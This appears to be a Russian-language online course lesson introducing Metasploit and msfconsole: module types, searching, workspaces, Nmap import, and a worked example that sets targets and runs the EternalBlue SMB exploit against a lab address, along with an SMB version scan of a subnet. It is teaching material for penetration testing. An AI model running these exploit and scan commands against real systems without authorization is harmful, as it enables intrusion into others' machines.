0Pricing
Cyber Security Academy · Урок

Архитектура Metasploit и msfconsole

Освойте навигацию в msfconsole, структуру эксплойтов, полезных нагрузок и модулей, а также настройку параметров.

«Архитектура Metasploit и msfconsole» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 1 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Что такое Metasploit

Metasploit Framework — это платформа с открытым исходным кодом для тестирования на проникновение, которая предоставляет единый интерфейс для разработки, проверки и выполнения эксплойтов. Это отраслевой стандарт для санкционированной эксплуатации в лабораторных средах.

Компоненты Metasploit

Основные компоненты: msfconsole (интерактивный CLI), msfvenom (генератор полезной нагрузки), Metasploit DB (PostgreSQL для хранения узлов и сеансов) и Armitage (графическая интерфейсная оболочка).

Запуск msfconsole

Запустите msfconsole и инициализируйте базу данных. Приглашение командной строки изменится на msf6 >. Автодополнение по клавише Tab работает для всех команд, имён модулей и параметров.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Типы модулей

Metasploit организует возможности в следующие типы модулей: exploit (код атаки для конкретной уязвимости), payload (код, выполняемый после эксплуатации), auxiliary (сканеры и фаззеры), post (постэксплуатация), encoder (кодировщик) и nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Поиск модулей

Команда search фильтрует модули по имени, CVE, платформе или рейтингу. Рейтинг модуля показывает его надёжность: Excellent > Great > Good > Normal > Average > Low.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

Использование модуля эксплойта

Выберите модуль с помощью use, просмотрите обязательные параметры с помощью show options, задайте значения с помощью set, а затем запустите модуль с помощью run или exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Настройка глобальных параметров

setg задаёт параметры глобально для всех последующих модулей — это удобно для LHOST, LPORT и RHOSTS, которые остаются неизменными на протяжении всей работы.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Вспомогательные модули

Вспомогательные модули выполняют сканирование, сбор сведений и фаззинг без доставки полезной нагрузки. Примеры: сканер версии SMB, перебор паролей для входа по SSH и сканер каталогов HTTP.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Управление рабочими пространствами

Рабочие пространства организуют данные сканирования и сеансы для каждого задания. В начале каждой проверки создавайте новое рабочее пространство, чтобы хранить данные отдельно.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Интеграция с Nmap

Импортируйте результаты сканирования Nmap в формате XML непосредственно в базу данных Metasploit, чтобы заполнить таблицы узлов и служб и обеспечить выбор целевых модулей.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Справка и документация

У каждого модуля есть встроенная документация. Используйте info, чтобы прочитать описание модуля, рейтинг надёжности, ссылки на источники (CVE и рекомендации по безопасности), а также обязательные параметры.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Быстрая проверка

Какая команда выбирает модуль в msfconsole?

Итоги: архитектура Metasploit

msfconsole — центральный узел: здесь выполняется поиск модулей, задаются параметры, запускаются эксплойты и управляются сеансы. Всегда работайте в именованном рабочем пространстве, импортируйте результаты Nmap для заполнения базы данных и читайте информацию о модуле перед запуском — понимайте, что именно и зачем вы выполняете.

Часто задаваемые вопросы

Урок «Архитектура Metasploit и msfconsole» бесплатный?

Да — полный текст урока «Архитектура Metasploit и msfconsole» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Архитектура Metasploit и msfconsole»?

Освойте навигацию в msfconsole, структуру эксплойтов, полезных нагрузок и модулей, а также настройку параметров. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 1 из 4.

Сколько времени занимает урок «Архитектура Metasploit и msfconsole»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Архитектура Metasploit и msfconsole
  2. Эксплуатация известной уязвимости
  3. Полезные нагрузки: поэтапные и цельные, Meterpreter
  4. Постэксплуатация: перемещение и закрепление
← Назад к Cyber Security Academy